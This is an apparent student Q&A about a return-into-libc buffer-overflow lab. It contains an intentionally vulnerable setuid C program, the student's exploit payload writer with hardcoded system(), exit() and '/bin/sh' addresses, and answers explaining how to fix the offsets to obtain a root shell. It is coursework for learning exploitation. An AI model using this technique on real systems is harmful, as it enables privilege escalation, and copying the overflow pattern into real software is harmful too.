# Return-into-libc Attack

Tags: c, linux, buffer-overflow

This is a two part question:

a)I am working with a Return-into-libc attack and not getting a root shell for some reason. I am supposed to take a vulnerable program: retlib.c.

```
/* retlib.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(FILE *badfile)
{
        char buffer[12];
        /* The following statement has a buffer overflow problem */
        fread(buffer, sizeof(char), 128, badfile);
        return 1;
}
int main(int argc, char **argv)
{
        FILE *badfile;
        badfile = fopen("badfile", "r");
        bof(badfile);
        printf("Returned Properly\n");
        fclose(badfile);
        return 1;
}
```

I am using my exploit: exploit_1.c

```
/* exploit_1.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buf[40];
FILE *badfile;
badfile = fopen("./badfile", "w");

    *(long *) &buf[24] = 0xbffffe86; // "/bin/sh"
    *(long *) &buf[16] = 0x40076430; // system()
    *(long *) &buf[20] = 0x40069fb0; // exit()

fwrite(buf, 40, 1, badfile);
fclose(badfile);
}
```

I found the addresses of system and exit using gdb:

```
(gdb) b main
Breakpoint 1 at 0x80484b7
(gdb) r
Starting program: /home/cs4393/project2/exploit_1 

Breakpoint 1, 0x080484b7 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40076430 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x40069fb0 <exit>
(gdb)
```

I found the /bin/sh address using the myshell.c program:

```
//myshell.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void main (){
        char* shell = getenv("MYSHELL");
        if(shell)
        printf("%x\n", (unsigned int) shell);
}
```

Than using the commands:

```
[02/15/2015 21:46] cs4393@ubuntu:~/project2$ export MYSHELL=/bin/sh
[02/15/2015 21:46] cs4393@ubuntu:~/project2$ ./myshell
bffffe86
```

I feel like I have done everything right, but I keep getting a "Segmentation fault (core dumped)". I am using no -fstack-protector, chmod 4755 and ASLR turned off. Any thoughts on what is wrong?

b) I am also working with retlib-env.c:

```
/*retlib-env.c*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(FILE *badfile)
{
        char buffer[12];
        /* The following statement has a buffer overflow problem */
        fread(buffer, sizeof(char), 128, badfile);
        return 1;
}
int main(int argc, char **argv)
{
        FILE *badfile;
        char* shell=getenv("MYSHELL");
        if(shell)
                printf("%x\n", (unsigned int)shell);
        badfile = fopen("badfile", "r");
        //system(shell);
        bof(badfile);
        printf("Returned Properly\n");
        fclose(badfile);
        return 1;
}
```

This seems to me to be similar to part a, but "In this example, the vulnerable program retlib-env.c will reference MYSHELL environment." I don't know what I need to add to my exploit to make it work. Any hints or nudges in the right direction would be really helpful. I have MYSHELL, but i'm not really sure how I need to reference it to exploit the retlib-env.c. Shouldn't it be pretty similar to part a?

Answer (score 0):

Probably the addresses of functions system(), exit() etc change at every program invocation. You cannot rely on loadng the pogram, degbugging for these addresses, closing the debug session and running the program again as the perogram may have been loaded at a completely different starting address the second time.

Answer (score 0):

```
$gdb -q retlib
```

You need to find system and exit address of retlib not exploit. Exploit only prepare a exploit file. Retlib reads this file till buffer overflow. As far as I know the system address segment should start 12 after the buffer that means it will be buf[24].

Answer (score 0):

The length of the program's name will influence the address of the environment variables in the stack. To get the correct address of string `/bin/sh`, you should keep the length of the program to search `/bin/sh` (i.e. `myshell`) equals the length of your final attack program (i.e. `retlib`).

Besides, you need to find out the return frame address which is supposed to be 4 plus the distance between `ebp` and `&buffer` in `bof`, which is supposed to be 20+4=24 rather than 16 in your code. You can verifiy it by `gdb` on the program compiled with flag `-g`.